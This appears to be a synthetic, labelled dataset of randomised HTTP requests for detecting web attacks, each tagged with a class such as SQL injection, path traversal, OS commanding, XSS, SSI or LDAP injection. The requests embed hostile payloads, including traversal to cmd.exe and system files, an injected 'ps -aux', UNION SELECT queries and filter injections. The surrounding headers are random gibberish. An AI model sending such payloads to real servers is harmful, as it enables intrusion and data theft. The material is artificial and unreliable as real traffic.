Cookie: mO5p90RrIM=enGNbM4@v;ciuqnbetinohN=hrselectinA;rBCeoexj=nfbTTqbeerAtudo;t4cT=dsoo3anrete;9CXZechoTMUH6J=89miwSbtv;862mshs6esns=ewfanetcatr
Cookie2: $Version="13"
Date: Sun, 09 Nov 08 12:56:14 GMT
ETag: W/"2pmeGZhNRIpjk2SWKzJ"
Expect: 1eaet=xvho;paeeore=ucea
From: ztifisTh@itMb.uk
If-Modified-Since: Mon, 13 Oct 08 21:43:56 CET
If-Unmodified-Since: Wed, 17 Jun 09 05:54:33 UTC
If-Match: "-aUfKaKEi7JU9073kL."
If-None-Match: *
If-Range: *
Max-Forwards: 7075
MIME-Version: 2.9
Pragma: nn=tmaee
Proxy-Authorization: Basic MkVhaTU6ZTJuVHRo
Authorization: Digest qop=auth-int
Range: 1-35,9436-,-246816
Referer: http://www.nvtraoI.cz/rrc85ub/eiolaeir/0E8ts/eewoc5/tf6a3s.php4
TE: deflate;q=0.7,deflate;q=0.3
Trailer: Host
User-Agent: Mozilla/8.3 (X11; U; Linux i386 5.2; op-oq; rv:5.7.1) Gecko/44929449
UA-CPU: 68000
UA-Disp: 879,3811,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 5277x2991
Via: pol1et/3.2 208.247.58.3, tgeld/5.6 26.150.182.93:087
Transfer-Encoding: 6m4f; thuaijt=aeYeat
Upgrade: Dimzxj/0.5, brr9/9.8, nqe8/0.3
Warning: 944 www.Jaealoez.html "Tccdyealtgcne" "Wed, 07 Dec 05 16:52:07 UTC"
X-Forwarded-For: 168.152.115.238
X-Serial-Number: 802337450581
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39349
Start - Id: 45968
class: PathTransversal
GET /gS/anvEckHRx7t/Wposition/iYnoxer/a5lQRx@/iy0-O2ne53--C.gif?cSCr4=98866&LP8MOPAHeZPn=ireoi&scbipa=snsor18nfbpGdocument&ueGTw=phpqeexterm&dl63od8tbrathl1=rBmEmN%40j&tepvbunaeElr=380217&dUo1Jei=973905236&ng2lbernci=09726&coan=ltelmzmerespLee&loh=..%2F..%2F..%2F..%2F..%2F..%2FWINNT%2Fautoexec.bat&cteteyi=ipositionsl&Ovtnfr6gialp=2382289&o8E5beHimefdn=89KF3QInuk&muncddhemeuYeE=407548 HTTP/1.0
Host: 243.163.71.89
Connection: close
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: a13-vdur
Client-ip: 12.220.22.8
Date: Tue, 29 Nov 05 07:19:17 GMT
ETag: "9s2FpruqLqSbT0QBEI"
From: Eypam@yBe9mr2i.cz
If-Modified-Since: Wed, 02 Jun 04 09:12:03 UTC
MIME-Version: 6.4
Pragma: obtlths=nch
Referer: /utiTld/eoa5b/ipeig/uiet.exe
Trailer: Authorization
User-Agent: Mozilla/0.7 (compatible; MSIE 2.8; Solaris; rsat; ebeln6o)
X-Forwarded-For: 54.78.195.221

null

End - Id: 45968
Start - Id: 50045
class: XPathInjection
POST /oJF40Pj56oAqukBMfK/3x/ce1i5rhtvcS6CdtrgA.jpg? HTTP/1.1
Content-Length: 63
Content-Language: e07pi,ut0mo
Content-Encoding: identity
Content-Location: http://www.eoyad.fr/taesh/amts/n8ulc.pl
Content-MD5: Mm4yOXJ5ZW90b2VzYTlmTg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 09 Oct 08 10:36:07 GMT
Last-Modified: Fri, 20 Oct 06 18:18:34 UTC
Host: www.aoon.st
Connection: keep-alive
Accept: image/png, video/mpeg, image/*;q=0.8
Accept-Charset: x-mac-chinesetrad;q=0.3, iso-2022-kr, iso-8859-1;q=0.9, big5, iso-8859-2
Accept-Encoding: 
Accept-Language: io4i-op;q=0.3
Cache-Control: no-cache
Client-ip: 233.61.70.142
Cookie: tba=vKPjSs2DP4;5sesyh=54   or    count(path/child::node()[position()=((i+j+k+l+1)] |    path/child::*()[position()=(k+1)])=1    or   561=
Cookie2: $Version="0"
Date: Fri, 09 Mar 07 06:15:02 UTC
ETag: "c7vfaaxMQjWmJ79sfOR"
From: hizpE@meYwOri.cz
If-Modified-Since: Fri, 16 Jun 06 06:07:07 CET
If-Unmodified-Since: Fri, 29 Apr 05 03:44:08 UTC
If-None-Match: "i3.SH5kFgLObCreQJ"
If-Range: Wed, 18 Feb 09 05:53:04 UTC
Max-Forwards: 189
Pragma: res='pio'
Authorization: Digest nonce
Referer: http://ebesuop.net/lS3uo9/vba5qsNn/isttsr/RaT7e3o/c63pm.css
TE: trailers,chunked,trailers
User-Agent: Mozilla/6.0 (Windows; U; Win 9x 6.8; lo-ea; rv:6.8.2) Gecko/17377155
UA-CPU: PowerPC
UA-Color: color32
Via: FTP/0.6 40.88.153.46:4
Transfer-Encoding: identity
Warning: 838 248.50.212.152 "Eenn" "Sat, 26 Jul 08 23:48:30 GMT"
X-Serial-Number: 723279947580286654
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

cn=32727027&nnetcWqnsomb4=eNnh6suigddulsidftp&lt4oFstcmsDo=nQne

End - Id: 50045
Start - Id: 45751
class: PathTransversal
GET /@aQPprocessing-instructionbLv/emkeeitToedeHs/HhttpsZBAtS-apasswdtsoscriptF/o83LBLunyLnDm8/u8rUR9/uNitnimrmeit/A75EGdl/nWPhQn/CdchildYHxcaEybodyMpZg.swf?rb0ypaass=a%3A%5Cwindows%5Cboot.ini&ZHasee=famoAl&eibdtWnioa=bhxdocumentjidohcsock_stream7group+by%7C&s2q6=1539&irs=llognev1+e%3Cti+%27kigrmwinnt&NIjttxw=570&oaeogsoe0lEga=eo&hj=t%27w5e&brulcUeto2fpht=sxqy7Gn9QK02&iIAGM=3385972659&gbaoS6znoht6eyb=lkaUOem3SR&tanowwwi=anic&eFjrcuioriiLw=1482&snhaihplenvijxx=sQY0ncndrR HTTP/1.0
Host: 231.153.114.205
Connection: aeSNgi
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 100.141.159.183
Cookie: tfWrecg=59;nROtxwrsmsqae=tdL;oywl=Ota;dew=die+
Cookie2: $Version="51"
Date: Sat, 24 Apr 04 04:45:20 GMT
ETag: W/"XOfNqF66G.unu7sQ.q1p"
Expect: 100-continue
From: nbuYYe@rnspS.ch
If-Modified-Since: Mon, 07 Aug 06 04:21:49 CET
If-Unmodified-Since: Tue, 31 Oct 06 13:57:04 GMT
If-Match: *
If-None-Match: "T@Y6o5kDzgA1A_hcbZ.h"
If-Range: *
Max-Forwards: 041
MIME-Version: 7.5
Pragma: s=lnv
Proxy-Authorization: Digest uri=/beS0.doc
Authorization: Digest response="094fe2ECEd1ec8875845BBFbA6Aae73d"
Range: -500252,934-3694
Referer: /crA7hth.gif
TE: chunked,gzip;q=0.8,trailers
Trailer: Range
User-Agent: aektmu/9.5.1.7.2
UA-CPU: StrongARM
UA-Disp: 0244,7553,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 337x559
Via: saehs/0.0 www.fcaW2ptt.shtml:909
Transfer-Encoding: 3Epmo
Upgrade: aGdne/3.3, slrmIL/7.0, hsea/2.9, wrhit/9.0
Warning: 138 195.65.50.48 "amRyeeev4t" 
X-Forwarded-For: 187.241.210.252
X-Serial-Number: 82558
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45751
Start - Id: 40554
class: SSI
GET /1H7/oeje/mdMv_vjGjU1epY/hoVi3ijxFJmLrZlmjo@/lirdhooNl3.sh?Ct0Drzdsd=+document3%3D&mnyta2uaStdu0xx=sMk%40abD1.&Kwget-UsEE=cpI74Edueerhs&ejeeapiiasoA=i0%2F+ii&OHo-estyleNBvbscriptYYT=%3Cdnic&8ktcXns=4vart%3Fax%5Btco&t4Ihtteu=pilpvn%24de&autoexec@V8SGaea2VI=i5psa8stt&Ch1ot=htI%5D&5etIw1Oslos=sa&tEeah9bdetwStu=%3C%21--+++++%23include++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++--%3E HTTP/1.1
Host: 18.168.194.91
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: *
Accept-Encoding: compress;q=0.3
Accept-Language: *
Cache-Control: max-stale
Client-ip: 125.226.150.170
Cookie: ISFQr6PDu=pJmlwczATQ;qVC.TWteorq9O=ehGSonzZ8w;ui=ntc6W;2as3ci=1711107
Cookie2: $Version="29"
Date: Fri, 08 Jul 05 11:40:04 GMT
ETag: "CQ8Sji9UIcN@wmVMA7MA"
Expect: 100-continue
From: tyoPDg0e@eA2xhe.com
If-Modified-Since: Mon, 29 May 06 14:13:58 CET
If-Unmodified-Since: Mon, 12 Feb 07 22:37:23 UTC
If-Match: "fNKjw-cln9ZBaF0"
If-None-Match: *
If-Range: *
Max-Forwards: 08
Pragma: no-cache
Proxy-Authorization: esno rs47tyd=n7dsbg
Authorization: Digest nc=04bCfCaa
Range: 092301-3,261-278,-586839
Referer: /cdea1m2t.msf
TE: gzip
Trailer: Pragma
User-Agent: eiKAkCq http://www.hdavw.biz
UA-Disp: 9897,2290,16
UA-OS: Windows 98
UA-Pixels: 0455x286
Via: 6.3 www.amubetoe.html:9307, 9.6 www.ob6x.shtml, z0vh/0.6 64.64.64.250
Transfer-Encoding: identity
Upgrade: ihigio/5.3, axaa/8.6, iom/3.5, erte4e/3.3
Warning: 885 www.ctsaoon.js "2nm3fnnnfehteoPv" "Sun, 30 Sep 07 18:31:53 UTC"
X-Forwarded-For: 62.56.145.236
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40554
Start - Id: 48086
class: XSS
GET /9ima3tBnhad/Kc4AYoHIb@fav/hXFcyCwPM@-7N9Rt24ot/.Hbump/3-jaL4usr1/UstDnalbt/3pmius/iodfejtonYttctasrs/bnm3rtee/hoiGlsinsiRi/g7xmallmhhoSaS/jfkhv.dll?ht0imr0mnYe=%3Cform%2Bname%3Dra8t++++%3E%3Cselect%2Bname%3DmorF++%3Ehttp%3A%2F%2Fwww.lhlwTr.com%2Ffsrer%2F%3F%3C%2Fselect%3E%3C%2Fform+%3E&lARauuw=0518630864&jhtacceseRD=2bl0areem5f&yc53tpphasuoac8=he&Sen=46&eaeP7h=rRT HTTP/1.0
Host: www.riRiz9oith.com
Connection: close
Accept: */*;q=0.0
Accept-Charset: iso-8859-9, us-ascii, iso-8859-1, euc-kr;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-age=0742
Client-ip: 220.26.106.26
Cookie: m0=1s ;V1wDS=sAeooszs;oleoersnra=wnqo5s3lu
Cookie2: $Version="02"
Date: Wed, 10 Mar 10 07:08:07 GMT
ETag: W/"d7O@30CYQD7MNCaw"
Expect: 100-continue
From: pr43lq@7remye.cz
If-Modified-Since: Tue, 25 Dec 07 17:05:34 GMT
If-Unmodified-Since: Sat, 07 Jul 07 10:37:52 CET
If-Match: "5Kc1cKHuLQnlE3EFXHA"
If-None-Match: "fuoh7eEbTW7LhPidu"
If-Range: Fri, 23 Jan 04 14:47:09 UTC
Max-Forwards: 7
MIME-Version: 2.8
Pragma: 7eObe='5sx'
Proxy-Authorization: Basic bGVpbnJsaTpvb2lDbA==
Authorization: Rucfn yksNds=e8tWg
Range: -179295,540225-63
Referer: /fknwsesd/lfpuis/ondu8om.aspx
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/3.3 (compatible; 4ie2cst4t; Win 9x; uaSEDlrO; oNll; a4onnehpsd)
UA-CPU: PowerPC
UA-Disp: 367,260,16
UA-OS: WinNT
UA-Pixels: 6001x2247
Via: FTP/3.9 96.5.18.94, FTP/2.2 www.aeuowt.gif
Transfer-Encoding: identity
Upgrade: latA/6.2, lyernh/8.8, vU0s/9.0, esnis/7.5
Warning: 178 250.228.149.199:2030 "1neeqi3e" "Sat, 26 May 07 03:25:33 CET"
X-Forwarded-For: 69.186.228.89
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48086
Start - Id: 43954
class: OsCommanding
GET /cgi-bin/../../../../../../../WINNT/system32/ping.exe 127.0.0.1? HTTP/1.1
Host: 180.103.6.67
Connection: keep-alive
Accept: text/*;q=0.0, application/*;q=0.1, image/*;q=0.5
Accept-Charset: cp-932;q=0.2
Accept-Encoding: identity, gzip
Accept-Language: *
Cache-Control: no-cache
Client-ip: 167.244.39.243
Cookie: XZ4cpWW7vqcI=/w6oyecM;/t>6 htacces ig ;jsozoenf=Rd;aabsi=Pst;nn8aia= &nph-D;tiutt6seen4q=5279013;kqreiseTxauNa=at1
Cookie2: $Version="790"
Date: Sun, 14 Oct 07 18:18:29 UTC
ETag: W/"1WAfNPVu-p-Eo8BQA2G"
Expect: Ktdna
From: axenii@lMdner.de
If-Modified-Since: Sun, 30 May 04 15:32:31 GMT
If-Unmodified-Since: Tue, 26 Sep 06 03:10:26 UTC
If-Match: "ODgc4cyMJr@4jwx32IM"
If-None-Match: "VOaYWKZvAx.oiVM"
If-Range: Sat, 24 Jan 04 24:31:49 UTC
Max-Forwards: 9
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM bmxnaGZjaGlvaHRyYm50MDZicmlncFptY3FUc25pbXp0c3J2YmhodHk=
Authorization: Digest realm
Range: 97793-3,500796-0
Referer: http://itaN.com/oke8iD4r/Usiairc/eine/nklc2c/raoyea.jsp
TE: trailers,chunked
Trailer: Via
User-Agent: E6oebsoIuils5
UA-CPU: 68000
UA-Disp: 7638,7203,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 539x520
Via: 4.4 178.53.171.229
Transfer-Encoding: gzip
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 327 www.3eSas.css "tdlqjc" "Sat, 26 Jan 08 18:17:22 CET"
X-Forwarded-For: 157.151.213.231
X-Serial-Number: 221610848523557
----: ------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43954
Start - Id: 42333
class: SqlInjection
GET /o.AG27pU4KpwcjO/amTk/fnww9TRWeL0AVJgqU-y.msf?5rEemcnwTIudnly=gr%5Dt&utDX8dutuiody=35&hwp-ygroup bywZItmppO=lkyHB&myLghttpAcathLncRF=+%5Casglib&omtR0trj0sou=likeerT&4yhe=OR++%27lrw64dl%27++LIKE+%27Sim%25%27&eeny=zN%2B+ui%27a%5BoEt&yyTma=mnm HTTP/1.0
Host: www.adbflq.org:373
Connection: close
Accept: image/*;q=0.0, text/*
Accept-Charset: iso-8859-3;q=0.6, iso-8859-1;q=0.2, iso-8859-5, windows-874;q=0.3
Accept-Encoding: 
Accept-Language: o-teona9t;q=0.2
Cache-Control: httale=n
Client-ip: 59.166.67.8
Cookie: qr8UjtttTsaj=jm1;9idgohevc=?r7alk;rsshoo=|msnsamsDt;M3VZyBGF=rr;y6oieroele=10;hennoedbrm=irtopenhoneo s0
Cookie2: $Version="0"
Date: Sun, 23 Sep 07 22:18:07 CET
ETag: "_05h89GLjeFPIMmU"
Expect: 100-continue
From: dtce1iim@oe8uountoe.de
If-Modified-Since: Wed, 23 Sep 09 02:10:13 CET
If-Unmodified-Since: Tue, 26 May 09 02:20:28 UTC
If-Match: *
If-None-Match: "kAFoLo6@VRtu3Cb"
If-Range: *
Max-Forwards: 256
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: aslasl sfwmhi=G8in4aid
Authorization: Basic ZWRhdzpsb2dFaA==
Range: -416,3-,-523324
Referer: http://kbrNem.fr/daEa/TNw0t/h2oE.cfm
TE: chunked;q=0.4
Trailer: User-Agent
User-Agent: Mozilla/2.8 (Windows; U; Windows NT 5.0; He-pp; rv:8.4.5) Gecko/98825751
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 999x243
Via: FTP/2.9 www.edns.tiff, 7.7 www.Ilesots.jpeg, 6.8 www.Eetlirr.html
Transfer-Encoding: deflate
Upgrade: a7a59/7.5, fns/4.8, 3c9id/4.9
Warning: 478 44.68.67.163:8 "haHdehmpgh" 
X-Forwarded-For: 171.143.1.2
X-Serial-Number: 73535
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42333
Start - Id: 42756
class: SqlInjection
POST /ldLu/l0lwiAxjf29jrb/UAunionj8NKqgida/oUk8.N-NjQ8SpSK.png? HTTP/1.1
Content-Length: 52
Content-Language: inz,gYtecouo
Content-Encoding: deflate
Content-Location: http://deeyae.it/So9n0flI/oanop/RnEaa/t0nn/5ere7.tar
Content-MD5: dG5rc2JlY29pc2lhYXUyZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 23 Jun 08 22:02:21 UTC
Last-Modified: Sun, 11 Jun 06 21:01:40 CET
Host: 204.216.92.249:9055
Connection: esojiyte
Accept: */*;q=0.4
Accept-Charset: x-mac-chinesesimp, iso-8859-4
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-stale=346
Client-ip: 92.192.226.154
Cookie: po=ErD3ecIwh'     UNION    ALL   SELECT  aauerh   FROM  9snux1Er WHERE   ''  =    ';xhtpassUFqx7M1w=oaa6u
Cookie2: $Version="553"
Date: Mon, 25 May 09 04:41:24 GMT
ETag: W/"tn7EPi_w6_IXb2y9I1B"
Expect: 100-continue
From: tnehuje@osoicnh.gov
If-Modified-Since: Thu, 18 Jun 09 08:45:14 CET
If-Unmodified-Since: Sun, 05 Oct 08 20:06:57 CET
If-Match: "u.sfJVK1Hxo@Ov-UNMMS"
If-None-Match: "8nj34qnX0kDO.64Wb6uW"
If-Range: Tue, 08 Sep 09 13:20:05 GMT
Max-Forwards: 6694
MIME-Version: 2.3
Pragma: s9ym7k5=taoakii
Proxy-Authorization: NTLM Y2lvaW1lMUVha2Eyb3h3bnRvbWFsZTdleGR5aHIwdG92cg==
Authorization: Digest realm
Referer: /snsy/aweo/amlO/si4u.wmn
TE: gzip,gzip;q=0.0
Trailer: If-Modified-Since
User-Agent: Mozilla/8.9 (Windows; U; Win 9x 3.3; l8-ee; rv:0.8.7) Gecko/41420846
UA-CPU: Sparc
UA-Disp: 511,399,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 885x378
Via: 4.9 www.nst2Ey5O.jpeg, HTTP/3.7 www.e1i6.jpg
Transfer-Encoding: compress
Upgrade: fru/3.0, tl1ne/3.4
Warning: 200 www.ierlebee.tiff "chcalstx9prp1n0pZc" 
X-Forwarded-For: 192.153.217.188
----: ---------------------------

tgvinTb0=22&hzaKl6dni9riAiE=23486170&omauena=s)grZ

End - Id: 42756
Start - Id: 43800
class: OsCommanding
GET ..%c1%pc...%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 220.80.199.48:2427
Connection: keep-alive
Accept: text/*
Accept-Charset: iso-8859-1
Accept-Encoding: deflate;q=0.5, deflate
Accept-Language: *
Cache-Control: min-fresh=44
Client-ip: 209.54.112.168
Cookie: arjat=fromighttp;oq8rude=wN5D7yB;Tj0p=ouziigrtnufde;@W0OnexecG5aR=7niHtls;wpsJuR=36159532;XAYEkK.gphp=Tlr t
Cookie2: $Version="3"
Date: Wed, 11 Aug 04 10:59:03 CET
ETag: "4oKNvrNCIHYKhCU0chJP"
Expect: dhegnagd=62iivlh3;nnyeyrs=kyKh
From: qto7read@r8owxth.de
If-Modified-Since: Fri, 19 Mar 04 03:50:23 GMT
If-Unmodified-Since: Sat, 07 Nov 09 21:22:36 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 13 Jul 04 16:04:14 GMT
Max-Forwards: 22
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="h4nye"
Authorization: Digest username="b1dayset"
Range: 904036-,02113-35,44499-
Referer: http://csls.gov/otTuc.png
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/7.4 (compatible; Konqueror/3.4; WinNT; taOmlydrd; a4LaooRM; 0coteeI)
UA-CPU: Sparc
UA-Disp: 7509,580,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 697x813
Via: FTP/0.9 46.63.122.3:505, 6.9 81.99.54.253:659
Transfer-Encoding: deflate
Upgrade: Vsr3e/6.8
Warning: 815 www.nitmdae.gif "rfe4pvnricgalni" 
X-Forwarded-For: 73.32.142.166
X-Serial-Number: 055444693738
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 43800
Start - Id: 38219
class: LdapInjection
GET /0Mf/tpdcu5LHEn7/tP/rtrCirazaetsxatn.swf?fsosoyA=886&XvDSbyt=eaoa5i%7Ezm&ojnaepu=xfof&irpreiv=ety&tureecty=27844&f4re5oemh=swinntzro%3CorsdrIlt4i&qtcnnetori5m4u=ietnaltea5simi&AlinkLg67-Vmail=6308828&toATesfnesprEr=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&htnataDdto2u=ereZ&someofoOyfe=4a%3Emlia+ar&EhCaiql0kt1Tlea=lediv+zoss%3C+ce&gv_O4GmVazE=owsoiisoorei&foouaan6=t9o HTTP/1.0
Host: www.eetnngdhre.org
Connection: keep-alive
Accept: video/*;q=0.6, audio/basic, text/xml
Accept-Charset: iso-8859-8-i;q=0.4, windows-1252
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 9.211.101.123
Cookie: lumloa5oba=iyerttmp;gjhpp=eypR
Cookie2: $Version="88"
Date: Mon, 09 Jun 08 07:45:47 CET
ETag: "HeHqGgYUuhkexda"
Expect: 100-continue
From: Oni9Cjt@Idhlgm9aom.net
If-Modified-Since: Sat, 31 Jul 04 13:58:58 GMT
If-Unmodified-Since: Tue, 05 Jan 10 08:12:00 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 28 Feb 05 23:10:28 CET
Max-Forwards: 4667
MIME-Version: 3.2
Pragma: evt='g'
Proxy-Authorization: fenea desahf1=7eTtla
Authorization: Basic ZXQxbmM6QzBvZXNBZ0U=
Range: -921
Referer: /tEnyobt/iwfC/dygrdkNa/aislbt/LclOh.php
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/7.3 (Machintosh; U; PPC 5.3; cc-s7; rv:9.1.4) Gecko/34071756
UA-CPU: Sparc
UA-Disp: 912,7281,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 321x2267
Via: 2.4 171.180.5.146, FTP/9.0 43.136.88.152, 4.9 www.qgbni3t.html:931
Transfer-Encoding: deflate
Upgrade: sdlwO/6.2, 4Awth/6.5, lsy/1.6, jri/4.6
Warning: 794 74.86.217.193 "6bkyotjee" "Mon, 16 Feb 09 06:30:50 GMT"
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 47317311019714332645
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38219
Start - Id: 43292
class: OsCommanding
GET /etcanodeB4@J9dropetccat8sF.asp?irourrel7=tV9ywd&e6f=0389&iTiTw=%27+++++%3B+++ps++-aux%3B HTTP/1.0
Host: 112.184.214.27
Connection: keep-alive
Accept: image/gif, image/*;q=0.7, image/gif;q=0.7
Accept-Charset: iso-8859-7, x-mac-korean;q=0.0
Accept-Encoding: compress, compress;q=0.0, identity, deflate;q=0.8
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 41.151.127.122
Cookie: 3locationh1=mPro8vtuju;toimcsegjwttsw=tmptgr3=ths;s2nE=eE/9%darA[Brg;cs1D6=rooPsstylen 1nh5c;AU5SGai=7855309
Cookie2: $Version="9"
Date: Sat, 21 Jan 06 01:51:46 CET
ETag: "6dhinw17JjJyr_-."
Expect: mb9t=tpt6m;rlemLtar
From: nJanczi@m0dios.gov
If-Modified-Since: Sat, 15 Jul 06 22:36:39 CET
If-Unmodified-Since: Sun, 26 Apr 09 18:31:51 UTC
If-Match: *
If-None-Match: "L7XVVs9eNE0iZyugMM.5"
If-Range: Wed, 14 Oct 09 18:05:54 CET
Max-Forwards: 8372
MIME-Version: 0.7
Pragma: eeqd5r=fg
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic eW5vaDppZWZIdGlo
Range: 16-654699,-01,-6683
Referer: /qc7Dl.css
TE: chunked,trailers
Trailer: Range
User-Agent: Mozilla/4.7 (compatible; teyohs; Solaris; supm0)
UA-CPU: MIPS
UA-Disp: 5548,243,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3321x719
Via: HTTP/2.6 200.86.88.200, izekyc/8.6 www.ys1ea.tiff
Transfer-Encoding: t7yI
Upgrade: hhiwe/3.0
Warning: 824 77.211.235.51 "cihtsshy" "Wed, 01 Mar 06 07:42:35 UTC"
X-Forwarded-For: 160.47.213.152
X-Serial-Number: 33268910997830583
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43292
Start - Id: 37166
class: LdapInjection
GET /OmKp/N7seteae1/j@cxSkqqZboTcf/5eedtpxaxch/eizalof9KloAnbvihaA/ao/d3etd5neri/y@6rV.rkz/ecDF4xGkrVZRFgo/unbmshaf2ttegoea40/n9D/iQ.8lUeZt0Dv6.asp?I53uzh5=beopenStelnet%28execlfeiframeaiservices%29%5Batelnet&Ee=02%29%28%26%28objectClass%3Ddo4r%29%28%7C%28sn%3DSmc%29%28cn%3Dsowe++J*%29%29&lib5VT2D=oVJs7 HTTP/1.0
Host: www.roMtsbt.cz:80
Connection: thtC
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.7, identity;q=0.9
Accept-Language: es6pVEs-e9cD3bsn;q=0.1, 48tstn1o-fyb;q=0.0, snco-aekAe, of2leyo-idp3r
Cache-Control: max-stale=460
Client-ip: 188.238.110.194
Cookie: ic8oL6lu.5E=2  winntf;nai=or;tHtpn7n=203689;ext6hSmdT=dEQo;usgQwex6=Dtgotdttni2;ougqr=11373
Cookie2: $Version="45"
Date: Thu, 06 Sep 07 17:33:54 UTC
ETag: "cmhDI5J8iYPu8ZT-g7OW"
Expect: 100-continue
From: leAt4Eeo@dfiwc.org
If-Modified-Since: Fri, 24 Jul 09 22:57:41 GMT
If-Unmodified-Since: Wed, 28 Jul 04 08:14:49 GMT
If-Match: *
If-None-Match: "D3YV@nqrLZimSBOdBtPb"
If-Range: Wed, 12 Jul 06 17:51:52 GMT
Max-Forwards: 5
MIME-Version: 5.3
Pragma: sr='h'
Proxy-Authorization: NTLM SWhyYWEwZXJOR29UdG5pOGh3c3JhYWRyb2pvbkw1c2VycHU=
Authorization: Basic YXBvczpza05p
Range: 183458-,10781-99705
Referer: http://2silodtx.cz/t7iaea.ace
TE: trailers
Trailer: Via
User-Agent: Mozilla/2.4 (compatible; MSIE 9.7; Solaris; iaefxrrr; 1ortIoyq; aodl)
UA-CPU: 68000
UA-Disp: 303,353,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5776x2501
Via: 1.4 www.Eetgej.png, 8.5 100.100.233.3:6541, 0.5 www.lhes1.js
Transfer-Encoding: deflate
Upgrade: Tri/4.5
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 203.59.253.98
X-Serial-Number: 6743183535814854929
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37166
Start - Id: 45827
class: PathTransversal
GET /eeaedoogcrie6toc/tcPjCsh/nMoP/dmt/.ueG3rLhvSW/n3wTkt4PG_/1_-kU/864GFENHgMnb/smZI8DVF/grOhUQlpfJFghZbYJ.mdb?Ud0yeqheBtb=cmdnZextmetat&mfonSVisi=9&NsvTn7yJn=2&s5Lrjnl=..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&vth5uoi=+nRdwa%5Bab HTTP/1.1
Host: 74.78.217.215:81976
Connection: s7Ebt
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.4, gzip, gzip, compress;q=0.6
Accept-Language: eo0en-lphUbaa;q=0.6, d-99s;q=0.4, johrsv-l
Cache-Control: min-fresh=73
Client-ip: 106.190.4.232
Cookie: isCniOnDei=154;GipVto1=7?ge>|;ceooeren0=4;fspmodcta=yRbQ.x;je-2Qsf=b@a+:sfolrk0emle
Cookie2: $Version="38"
Date: Wed, 20 Aug 08 14:07:47 CET
ETag: W/"0Tmw.hj-HlQDAFpQyyGj"
Expect: tons32
From: Ea5ne@1d8iisnai.ch
If-Modified-Since: Sun, 28 May 06 20:36:37 UTC
If-Unmodified-Since: Wed, 28 Jan 09 08:24:56 GMT
If-Match: *
If-None-Match: "69C5j7HT5gbR-GiDubi"
If-Range: *
Max-Forwards: 3
MIME-Version: 9.7
Proxy-Authorization: Digest uri=http://www.ncrl8sh.ch/2nled.asp
Authorization: NTLM czR1Z2V0dG9nbmVveXJhZWxzaHJhc2NSNHVjbTFydHN0dXRPdXB3ZXd0
Range: 09236-
Referer: http://www.elebiN.net/tdzm7/nrdiuw5/ekleil/resrre/BWmOc8.sh
TE: chunked,deflate;q=0.0,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/8.8 (Machintosh; U; Mac OS X 7.5; wn-ns; rv:2.7.5) Gecko/40224208
UA-Pixels: 1524x385
Via: ee7haM/9.0 www.tbog.png, 1.7 www.e0orOtoR.tiff
Transfer-Encoding: compress
Upgrade: nhla/4.5
Warning: 559 www.tI7c.css "nAtao" 
X-Serial-Number: 25397478987579
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45827
Start - Id: 38335
class: LdapInjection
